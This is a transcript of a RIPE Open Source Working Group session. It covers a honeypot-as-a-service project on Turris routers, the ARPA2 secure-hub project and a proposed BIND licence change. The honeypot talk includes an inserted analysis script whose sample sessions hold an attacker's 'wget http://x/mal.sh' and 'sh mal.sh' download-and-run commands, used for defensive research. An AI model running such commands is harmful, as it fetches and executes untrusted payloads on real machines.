ONDREJ FILIP: Thank you very much Martin.
(Applause)

Just before the session someone asked me whether there was going to be some presentation about something new in the Turris project. I said not exactly, but he is going to talk about a new project which is called honeypot as a service, and that also runs on the platform of the Turris project.


BEDRICH KOSATA: Hello everybody. My talk will be, let's say, a pitch about something we are developing, or started developing, as part of the Turris project, but now we would like to spread it more to the public. So I would like to find interested parties to talk to or cooperate with on this.

So, just at the beginning, shortly: what is a honeypot? I don't think I have to tell you, but just to be sure. Very simply, it's a machine that is vulnerable, has some open ports exposed to the Internet, and the attacker can really log into the machine or access the service, but he is observed from the outside and we record everything he does there. So it's very interesting for finding out how the attacker behaves, what he does and so on.

Usually it's run in a simulated environment. It isn't a live machine but something simulated, so that the attacker cannot really do anything harmful; he cannot send spam from there and so on.

And there are honeypots for different protocols. What comes to mind is SSH and Telnet, but other protocols are interesting as well. It's interesting, for instance, to have an open web proxy, which is something that attackers are looking for as well, and see what they are trying to push through the proxy; or also SMTP, where it is very interesting to see what they are trying there.

So, honeypots are very useful, they give you a lot of information, but they have some problems. We have been running honeypots for several years now, and the problems as we see them are that you usually can only run a small number of them. You don't have such a huge number of, let's say, machines, and even if you did, you would have a problem with, for instance, IP addresses and the location of the machines, because you usually don't have so many prefixes to distribute the machines amongst. And if you don't have many machines, with time the IP addresses of the machines get recognised by the attackers and they don't come to the honeypot as often as before. So it doesn't work so well over time.

And another pitfall is that the simulated environment isn't perfect. If it really were able to simulate the machine perfectly, then it would be the machine and it wouldn't be a simulation any more. The problem is that it's easy to find out that you are actually inside a honeypot, for example by running a command with some specific switch that is not implemented in the honeypot, or something like this. So, these are the pitfalls. And for the first two of them, we decided that it would be great to have the honeypots run by end users, so users at home, or when they have a server somewhere or whatever, could run a honeypot there, which would give us a lot of, let's say, free honeypots, or a lot more honeypots than we can run on our own.

And this is where Project Turris comes into the picture. Project Turris is something that was started three years ago, and as part of this project we gave to users in the Czech Republic about 2,000 of these blue boxes, which are routers, and which we use as a network security probe that we maintain centrally. Also, most of these routers have a public IPv4 address, which is very important if you want to have a honeypot: it has to be visible from the outside. And even though IPv6 is catching on, I won't say that it's so popular amongst attackers yet, so most attacks we see only on IPv4.

Luckily for us, we decided to give Turris preferentially to people with a public IPv4 address, so this is okay with Turris.

So, Turris as a honeypot: this was the idea. It has the advantage that there are a lot of them, much more than we have in our own infrastructure. They are spread throughout the Czech Republic, both geographically and when it comes to ISPs, so the number of, let's say, IPv4 prefixes available there is pretty large. Also, some IP addresses change from time to time, when the ISP gives different addresses to the users over time, so this is also an advantage: they cannot get onto a blacklist too easily. So we thought this was an interesting proof of concept, let's try it. But a very important condition was that it must not endanger our users in any way. Even though the honeypot is simulated, there might be some bug which would allow the attacker to break out of the honeypot and reach the machine itself. It shouldn't be possible, but who knows, so we decided we should somehow get around this, because in case the attacker really got out of the honeypot, he would see the whole network of the home user, and this is something we didn't want.

So, we created something that we call honeypot as a service, and what it means, in fact, is that when there is an attacker trying to, let's say, log into our router over SSH, we use our own server and redirect the traffic from the Turris to this server of ours; the honeypot is then run on this server, from which the reply goes back to the router and is forwarded to the attacker. So the attacker thinks that he is communicating with the Turris router, but in fact everything is running on our server, and the Turris just forwards the packets, or the traffic.

So, this is the idea of the honeypot as a service. What software do we use for it? We use it for SSH for now; we are planning some other implementations. The server is run at CZ.NIC and we maintain it, and the user just has to install a very small, simple application on the router. So it's very easy for the user to start contributing to this honeypot project.

The way it works is that on our server, for every user, we have one port open to which we redirect their traffic, so we can easily distinguish from which router the data are coming. And because we maintain the server centrally, we can very easily upgrade it, and if we find that attackers have a new way to recognise the honeypot, we can fix it; we don't have to deploy any updates to users, we just upgrade our server and it works.
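
As a conceptual sketch of this forwarding scheme, here is a minimal router-side relay that accepts the attacker's TCP connection and pipes it to the central server on the port assigned to that router. The hostname and port are made up, and the real Turris client (the mitmproxy application mentioned below) does considerably more than this; treat it only as an illustration of the idea.

```python
# Conceptual sketch of the router-side forwarder: accept the attacker's TCP
# connection locally and relay the bytes to the central honeypot server on the
# port assigned to this router. Simplified illustration only.
import socket
import threading

LISTEN_PORT = 22                                     # where the attacker connects
HONEYPOT_SERVER = ("honeypot.example.net", 40123)    # per-user port (assumption)

def pipe(src: socket.socket, dst: socket.socket):
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    finally:
        dst.close()

def handle(client: socket.socket):
    upstream = socket.create_connection(HONEYPOT_SERVER)
    threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
    threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()

def main():
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", LISTEN_PORT))
    srv.listen()
    while True:
        client, _ = srv.accept()
        handle(client)

if __name__ == "__main__":
    main()
```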

The data that we get from the honeypot, the SSH sessions that we see there, the commands and so on, we log centrally and then present to the users via the web interface they have for the router, and we can also do some kind of centralised analysis of all the data, where we see the bigger picture from all the honeypots.

The software we use on the server is called Cowrie; it's written in Python and it's a fork of an older honeypot server called Kippo. We have modified it slightly to support running on multiple ports. If you are interested, it's available on our GitLab, and we will also make it available on GitHub later on.

On the client, we use just a small application which is called mitmproxy, because what it in fact does is a man in the middle attack on the connection or something very similar. It's also open source, and it's also available on our GitLab, if you would be interested to see how it works.

Now, some results. Everything we are showing is from the traffic that we have observed in the honeypot this year.

We have something like 350 active users. This is because we didn't install it for all the users, we just asked them if they would be so kind and help us with this project, so 350 users from those 2,000 activated it. We got something like 2,000 SSH sessions per day from all these users, and roughly about 4 commands per session, but there are some sessions where there's only one command and there are some when there are even, I don't know, 50 commands or more. But these are relatively rare.

Since the start of this year we have seen something like 36,000 unique IP addresses of attackers inside the honeypot. Here is, for instance, the distribution by country. You can see that Argentina is very active in this field. It wasn't last year; I don't know what happened there, but this year they are much more active than they used to be. And when we have this data, we do some kind of analysis on it. We look, for instance, for common patterns; we try to find attackers that use the same set of commands or behave in a similar way. One interesting example: there are about 13,000 attackers that use the same set of commands; the session is completely the same, it's automated. More than 70% of them are from Argentina, most of them are from Telefonica Argentina, and most of them have one specific port open which is used for DSL provisioning. We think it might be that someone discovered a hole in this kind of machine that Telefonica in Argentina uses and might have installed some kind of malware on these machines. It might be something different. But it's very interesting to find out that some of these groups are located in a specific area or served by a specific ISP.
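
A sketch of that kind of pattern analysis: group sessions that ran exactly the same command sequence and count the distinct attacker IPs per group. The input format is an assumption, with a few made-up example sessions; it is not the actual analysis code used for the Turris data.

```python
# Sketch of the pattern analysis mentioned above: group honeypot sessions that
# ran exactly the same command sequence and count how many distinct attacker
# IPs fall into each group. Input format and example data are assumptions.
from collections import defaultdict

sessions = [
    {"ip": "203.0.113.5",  "commands": ["uname -a", "wget http://x/mal.sh", "sh mal.sh"]},
    {"ip": "198.51.100.9", "commands": ["uname -a", "wget http://x/mal.sh", "sh mal.sh"]},
    {"ip": "192.0.2.77",   "commands": ["cat /proc/cpuinfo"]},
]

def group_by_command_sequence(sessions):
    groups = defaultdict(set)
    for s in sessions:
        key = tuple(s["commands"])        # identical sequence -> same group
        groups[key].add(s["ip"])
    return groups

for commands, ips in sorted(group_by_command_sequence(sessions).items(),
                            key=lambda kv: len(kv[1]), reverse=True):
    print(f"{len(ips)} unique IPs ran: {' ; '.join(commands)}")
```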

Here is how it looks for the user. I obfuscated the IP addresses, but you get the idea. The user of the Turris just logs into this web account, and this is the list of sessions we have observed in the honeypot. He can drill down to individual sessions and see the commands that have been run there. This is a fairly typical session, where you can see that the attacker tried to get some information about the machine, then tried to get some binary from the Internet, run it and see what happens, then again some collection of data. This is fairly typical, especially the downloading of the malicious code. So we had a look at the data on this: during this year we have seen something like 55,000 wget commands, and of the IP addresses used in these commands to host the files, there were more than 600, mostly from China, but also from the US and other countries.

So, this was just an example of the data we can gather from this honeypot. What are the future plans for this? We have offered it to Turris users, and we would like to offer it to the public. Right now it's somewhat built into the infrastructure we use for Turris, but we would like to open this up, and this is why I'm talking about it here: we would like to provide it to others, to offer it for usage on servers or other routers and so on. We would also like to start publishing the data. Right now the data we get are covered by some kind of contract that we have with the user, so we cannot release them to the public, but in the future we would like to make this data open so that anybody can take the data and try to use them for their own research.

As I said we would like to create clients for common systems. And we would also like to work on improving the analysis of the data to find new stuff and so on.

The whole idea why we are doing this, is that we would like to really show people what is going on on the Internet, how dangerous a place it can be if you are not careful, and this is the main goal of the whole thing.

So, what are the potential areas for cooperation? One of them is that if you are running your own honeypot, it might be interesting to get together and work on it jointly, to improve it, because you constantly have to improve the simulation. Also, it might be interesting for you to run this honeypot-as-a-service central server for your own users and offer it to them. But what we would be most interested in would be creating some kind of, let's say, federated system, where it would be possible to run these honeypots around the world and combine the data together, maybe even have some central point where the users can log in and so on, so that it would be really easy for them; and the more data we gather, the better. So if you are interested in this technology, if you would be interested in running such a honeypot, please let me know. We are just starting to open this up, starting to work on it, so the sooner we get feedback, the more we can shape it so that it's interesting for others.

So this is everything from me. Thank you very much. I'm hoping for some talk about this later from interested parties.

ONDREJ FILIP: Thank you very much. We have time for a few questions.

AUDIENCE SPEAKER: Peter Hessler talking for myself. I currently run a system to distribute IP addresses that show certain characteristics so I would like to talk to you off line about possibly integrating the data you're seeing about the attackers with the system that I'm running.

AUDIENCE SPEAKER: Ben Yurian from Sweden. The man-in-the-middle proxy, is it a possible DDoS point for the server, if someone finds out?

BEDRICH KOSATA: Yes, it is possible. What we do is we are limiting the number of connections that can come to the central server so that it doesn't go over the amount of traffic we know we are able to handle. So sometimes the attacker cannot get into the machine; it looks like it's unreachable or something like this. So that's not a problem; we are aware of it and we have some mitigation for this.

AUDIENCE SPEAKER: Lovely work. It is awesome and I'm going to enable this on my Turris later. I like the open data idea, but I'm a bit worried about publishing IP addresses of compromised hosts, so I hope you'll take good care of that.

BEDRICH KOSATA: Yeah, that's a problem, and this is something, especially now that the IP address is officially personal data, we should take care of; this is future work. But I think the data might be interesting even if it doesn't contain really specific IP addresses; it might be just, I don't know, a /4 or something, but it still might be interesting for some researchers.

AUDIENCE SPEAKER: Oh definitely. And are you all right ‑‑ are you only collecting data right now or are you also working with abuse groups yet to try and take down the command and control centres or anything.

BEDRICH KOSATA: We are directly connected to the national CSIRT team and we do bring this data to them so that we can somehow cooperate. We tried to contact some of the ISPs where we have seen larger botnets, but mostly we do it through the CSIRT team. We also use the data to protect our Turris users by warning them: if one of the addresses that we see there as an attacker is contacted back, not from the honeypot but from somewhere else, then we know that there may be a problem somewhere. We have found an open Samba, for instance, in this way: someone was just sending data from Samba to an IP address in Albania that was an attacker we had seen. So this is also another use of the data.

AUDIENCE SPEAKER: My name is Carlos, I come from LACNIC, and your findings about attackers coming from Argentinian IPs certainly got my attention. Just a comment: I would like to have a word with you, because I have contacts in Telefonica and could get this data to them. And also, I was wondering whether you can integrate data feeds from other sources, because I don't have a Turris box but I would very much like to contribute data. In fact, I am collecting data using tools created by CERT.br which do a very similar thing to what you are doing here, and I would really like to contribute somehow.

BEDRICH KOSATA: We currently don't use other data for this. Rather, we use the data from the honeypot and integrate it into another system that we are building right now; it is one of the sources of data that we use in a different system. But it might be interesting for us to have a different source of data from you as well. So, let's talk about it later.

ONDREJ FILIP: Thank you very much. And now we have time for two lightning talks, eight minutes for each. First is Sarah Dickenson.


SARAH DICKENSON: So, my name is Sarah Dickenson, and what I'm going to talk about is the ARPA2 project. This is a project I have only recently become involved with, but I think it's reaching an interesting stage and it's the right time to start raising awareness of it in the wider community. It's the brainchild of two people, Michiel Leenaars and Rick van Rein. They have been blogging for quite some time about their thoughts on where the Internet is, where it could be and where it should be, and their ideas about the philosophy behind this are on the internetwide.org website. They have a blog there; if you want an in-depth view of the philosophy behind the project, I encourage you to read the blog on that website.

The ARPA2 project is the concrete project that has emerged from their thinking on this and is now underway. So I'll try to touch a little bit on both sides of this.

So, where they started with their problem description was thinking about where the Internet is today, what it offers and specifically what it offers end users. As we know, the Internet is made up of many domain names, many service providers, many resellers, but what's true is that a large swathe of the service providers are providing largely equivalent services using largely equivalent architectures and tools. And for a lot of end users that means they get web access and they get e-mail.

In that landscape, you have market forces, which can lead to pricing wars where it's about who can do things cheaper rather than better. And service providers are very aware that introducing new services involves both cost and risk, and this can be a real deterrent to the evolution of the offerings that they have.

There are also obviously platform walls. Now, everybody in this room is an Open Source supporter, but sometimes some of the business models associated with Open Source are not as clear as they are for closed, profitable platforms. And a very important issue on the Internet today is that the ownership of user identity is a very powerful thing, and that's not just politically relevant, but has also now become much, much more of a legal issue.

So, the vision behind the internetwide.org philosophy is that they want to move from where we are now to a decentralised Internet that is designed with both security and privacy as first principles. And the way they see this happening is that they want to provide a ready-made future Internet stack that can be used by those hosting providers to move forward in their service offerings. But it should use existing technologies, standards and proven, deployed software. And the goal would really be that you can then provide the whole range of essential Internet services in a distributed and trustworthy manner.

So, to think a bit more about what you have to do to produce a solution for that: firstly, it really has to be a drop-in replacement, or else it just isn't going to get adopted.

Secondly, it has to meet the real world needs of those providers. Again they just won't pick it up if it doesn't do that.

It also has to be user friendly, or that in itself would be a barrier to deployment and adoption.

Another important consideration is that those providers are operating in a market with very, very small margins, so you can't require a big investment in new technology from the people operating there.

So, the way to go is to use standards-based, open platforms, to use best practices as part of that, and to use the technologies that we have been hearing about all week, DNSSEC and IPv6.

So, as for the project itself, the key players are the NLnet Foundation, which is an Open Source foundation based in the Netherlands; OpenFortress, which is an organisation involved in networking and cryptography; and internetwide.org itself. We currently have a team of 8 developers, some full-time, some part-time, working on this. The overall project is going to be split into four phases: Secure Hub is the phase which is currently underway, and it will be followed by Identity Hub, Plugin Hub and Social Hub. Unfortunately, today I don't have time to go into too many details of the other stages, so I'll concentrate on Secure Hub; again, there is much more information on the website.

So, to delve a little bit more into what is being implemented in this phase: Secure Hub uses the technologies TLS, DANE, LDAP and Kerberos, and the way that is coordinated is through three components. First of all, there is the TLS Pool, which is a central management point for TLS connections for all the applications on an endpoint.

Secondly, to enable that, there is work on TLS-KDH, which is a combination of Kerberos, Diffie-Hellman and TLS. And thirdly, SteamWorks is a framework for the distribution of the configuration required for all of this.

Very briefly, the TLS Pool: it's a daemon that runs on the client, and it manages not only the TLS connections but also the credentials for all the TLS connections that come out of that box.

So essentially, an application can hand over, for example, an unencrypted file descriptor to the TLS Pool daemon, and the daemon will apply a policy, retrieve credentials and hand back an encrypted connection. It removes the requirement for the application to have all that level of knowledge in it, and it also provides a central place for policy and credentials management.
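As a minimal sketch of that hand-over pattern, assuming a hypothetical local daemon socket path and a one-message exchange (the real TLS Pool exposes a C API, so the Python below only illustrates the idea of passing a file descriptor to a local daemon and getting one back, not the actual interface):

    # Illustrative sketch only: socket path and message are assumptions,
    # not the real TLS Pool wire protocol.
    import socket

    TLSPOOL_SOCKET = "/var/run/tlspool.sock"  # hypothetical daemon socket

    def starttls_via_daemon(plaintext_sock: socket.socket) -> socket.socket:
        """Hand an unencrypted connection to a local TLS daemon; the daemon
        applies policy, fetches credentials and speaks TLS on the network
        side, returning a new fd the application uses for plaintext I/O."""
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as ctl:
            ctl.connect(TLSPOOL_SOCKET)
            # Pass the plaintext connection's fd to the daemon (SCM_RIGHTS).
            socket.send_fds(ctl, [b"starttls"], [plaintext_sock.fileno()])
            # Receive the replacement fd from the daemon.
            _, fds, _, _ = socket.recv_fds(ctl, 1024, 1)
        plaintext_sock.close()
        return socket.socket(fileno=fds[0])

The point of the pattern is visible even in this toy version: the application never touches certificates, keys or TLS configuration, because all of that lives in one daemon per machine.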

To support this, SteamWorks is a framework made up of three components. Crank is the entry point for the TLS policy, and there can be many of these distributed over many systems.

Shaft is the component that then combines those policies into a single coherent picture.

And the Pulley component will pull that policy down and deliver it into the TLS Pool on the machine.
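As a minimal sketch of that Crank/Shaft/Pulley dataflow, with all names, policy keys and data structures invented for illustration (the real SteamWorks distributes configuration between machines, which this in-memory toy model does not attempt):

    # Toy model of the Crank -> Shaft -> Pulley dataflow described above.
    from typing import Dict, List

    def crank(entries: Dict[str, str]) -> Dict[str, str]:
        """Crank: an entry point where an operator feeds in policy fragments."""
        return dict(entries)

    def shaft(fragments: List[Dict[str, str]]) -> Dict[str, str]:
        """Shaft: combine fragments from many Cranks into one coherent view;
        later fragments override earlier ones in this simplistic merge."""
        merged: Dict[str, str] = {}
        for fragment in fragments:
            merged.update(fragment)
        return merged

    def pulley(policy: Dict[str, str], local_store: Dict[str, str]) -> None:
        """Pulley: pull the combined policy down and deliver it to the local
        consumer (in the real system, the TLS Pool on that machine)."""
        local_store.clear()
        local_store.update(policy)

    if __name__ == "__main__":
        site_a = crank({"*.example.net": "require-dane"})    # hypothetical policy
        site_b = crank({"mail.example.net": "kdh-only"})     # hypothetical policy
        combined = shaft([site_a, site_b])
        tlspool_config: Dict[str, str] = {}
        pulley(combined, tlspool_config)
        print(tlspool_config)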

Finally, a little bit more about TLS-KDH. The goal here was to combine the best ideas related to doing both user authentication and encryption. There is a draft going through the IETF which is a very worthwhile read; it builds on a lot of earlier ideas, but this draft seems to be getting traction, and we currently have an implementation. A patch will be offered to GnuTLS shortly to implement this.

So, to wrap up: Phase One is underway. The target for its deliverables is July 1st. It's going to be supported both on Linux and on Windows, and the code will all be available on GitHub. Once that's complete, we'll move on to looking at phase 2, which is the Identity Hub and the identity management work. If you are interested, please either grab me after this session or join the mailing list that has just been set up for interested parties. So feel free to discuss it there or bring it to me after the session. That's everything I have got. Thanks very much.

ONDREJ FILIP: Thanks very much, Sara. We have time for one or two brief questions, so if you have any, please go to the mic. We have one.

AUDIENCE SPEAKER: Hi. Shane Kerr. This is interesting. I'm not ‑‑ I guess I'm a little confused about the architecture, so, this is intended to run in hosting environments, right?

SARA DICKINSON: There is going to be the client and the server side, yes.

SHANE KERR: Where are the clients intended? Are these just for like regular clients ‑‑

SARA DICKINSON: Yes, we're going to package it for end user use, so you can pick it up.

SHANE KERR: That's good.

ONDREJ FILIP: The last speaker is Jeff Osborn. He chose quite a good topic for the Open Source route, which is licensing, so thank you very much for raising this, and we'll learn something more about BIND licensing in a short while.

JEFF OSBORN: I should know better than to get between a group and lunch time, but they have been feeding us enough snacks that I don't think that's really valid.

A lot of people today and throughout the week have been talking about Open Source as a business and the challenges of funding it. I run ISC, my name is Jeff Osborn, and for several decades ISC has been funding itself through a variety of mechanisms, currently mostly through licensing BIND and DHCP. We made a change with our new ground-up DHCP product in January and released it under the Mozilla MPL 2.0 licence, and that started us thinking about the licensing of BIND, which has been under what is actually an ISC licence that we wrote; it looks a lot like the BSD licence, very permissive. We started thinking about changing that for BIND with our new release in the fall.

So, we have had a series of discussions internally, and through a combination of an accident of the calendar and the fact that BIND probably has the greatest number of supporting customers and partners for us anywhere in the world, we decided to make it public that we were discussing this. I put the slides together fast because it was a lightning talk, and I realised they don't use the term "we are considering" but rather say "we are". So I need to make clear that, while this has been discussed internally with the board of directors, discussed internally with our employees, and last week discussed with some of our larger customers, this is the beginning of a public discussion about whether it makes sense.

I have been around the Open Source wars long enough that I can remember when rocks and tomatoes and pitchforks would have been thrown at us for bringing any of this up. The discussion to date has been remarkably civil and remarkably positive, so I'm going to be hopeful it will continue to be both. What we're looking for from the community is input on just about any aspect of this. This is something we would do in the fall, if we did it at all.

The hard thing is that you can get into an argument about which licence means what, because there are way too many Open Source licences already until you try to find one which specifically does what you want, which explains why you end up having to write another one. So we're caught in that back and forth right now, but rather than saying "here is the licence we have chosen" and hearing why the intentions behind it are wrong, I want to explain what our intentions are.

We estimate, although it's hard to say because we don't have a phone-home in the code or anything, that we have about a million users of BIND, and we know for a fact we have about 100 paying customers. That's a gap of four orders of magnitude between the number of users and the number of payers, quite different from what somebody like Oracle has. So, I would argue that to go after those million users would be morally and ethically wrong, indefensible, stupid and a bunch of other things. But I think there are another dozen or two users of BIND who are simply changing the code for commercial benefit and then neither giving the code back to the community nor offering us some kind of compensation in the form of an exception licence. And that's something that in the free software world has been widely considered a good idea for decades, so I don't think we're doing anything radical here, but, again, I'm offering it up for input from the community of users that you represent.

Again, this is not making something commercial that was previously Open Source; it's still Open Source. We're just hoping to charge for the exception for people who refuse to put their changes back into the community. And speaking of community input: Joao.

AUDIENCE SPEAKER: Well, the original ISC licence was good for its purpose when it needed to be that way, when the goal was to kind of preempt the development of proprietary, non-standard DNS software. Having something like the ISC licence actually achieved the goal of keeping the DNS one and only and sticking to the standard; otherwise we would probably have fallen victim to embrace-and-extend schemes. What people perhaps didn't realise is that doing it that way required a substantial amount of funding to be able to carry on the process when there was no guaranteed return at all, because you are just giving it away with no conditions at all. Since that time, I believe everything has evolved: there are more Open Source implementations now, there are more people contributing to this idea of keeping the DNS one and only, and it is also much harder to get funding these days. So, I think a change like this makes perfect sense in this day and age, and I think BIND will still be able to achieve its goals.

JEFF OSBORN: Thanks for the vote of confidence, Joao.

AUDIENCE SPEAKER: Benno, NLnet Labs. Just thank you for bringing this discussion into the room. NLnet Labs is in a similar situation: we love the permissive BSD licence, but we also need some funding, some compensation, to invest in and maintain our code. Again, we love our permissive licence, but we also have to consider, for example, patent protection, and BSD doesn't seem to be the appropriate licence for that; think of poison-pill constructions for patents, for example, or automatic licence assignment -- sorry, automatic property transfer with contributions. So, again, we are also considering our position. This is an ongoing discussion; we are also reviewing our Open Source licensing scheme. I don't have an answer, but it's good to have this discussion here in the group, and I'd love to talk with you and with the rest of the community about the challenges we are facing.

ONDREJ FILIP: I'm sorry, I have to cut the discussion a little bit because we are running over time. Just a few words: we almost exclusively use the GNU licence, and we don't have such problems because we stick quite strictly with it, so I understand your problems. Maybe GNU is the reason we have a much higher ratio of payers to users, so our ratio is much better than yours; it works a little bit better when we use this very restrictive licence. So -- two brief comments and then we have to finish the discussion.

Maybe that's a good topic for the next Open Source Working Group. We can expand on this issue because it seems to be very interesting for developers. So...

AUDIENCE SPEAKER: Shane Kerr. I fully support this change. A GPL-style licence like this, anything that requires people to contribute changes back, is a great idea. Especially in DNS: I have talked to many people who explain the awesome things that their proprietary forks of BIND do, and it makes me very sad that they will never see the light of day. So this is a great way not only to help ISC be more sustainable and able to do more things, but also just to help the code itself.

AUDIENCE SPEAKER: Peter Hessler from OpenBSD. Our primary licence template is the ISC licence and we very strongly like it. We have zero intention of changing away from that, and it is a requirement for software to be included in OpenBSD that it be under an ISC, MIT or BSD licence. We consider the Mozilla licence, the GPL or anything like that unacceptable for licensing within our project, so even though we are no longer including BIND within it, we would be unable to upgrade beyond a pre-9.11 version if this licence change were to happen. So, just as a possible disagreement from the perspective of the community.

ONDREJ FILIP: Thank you for that comment.

JEFF OSBORN: Let me just say, one of the hard things about this is that you want to talk to everyone in advance and you can't, so it's difficult to announce something having previously talked to everybody. The physics got in the way, but I would love to have a discussion before we go. I am here through tomorrow.

ONDREJ FILIP: Thank you very much for bringing this topic. Thank you.

MARTIN WINTER: Okay. That's the end of the session today. I just want to remind you that before the next RIPE meeting there will be open slots for election. If you want to replace one of us, or if you want to become an additional Working Group Chair, the window opens, I believe, about two months before the next RIPE meeting. There will be an announcement on the list. You can start thinking about this if you think you can do better or want to help us out.

ONDREJ FILIP: We have to thank the scribes and the stenographer. Thank you very much for the marvellous work. See you at the next RIPE meeting.

(Lunch break)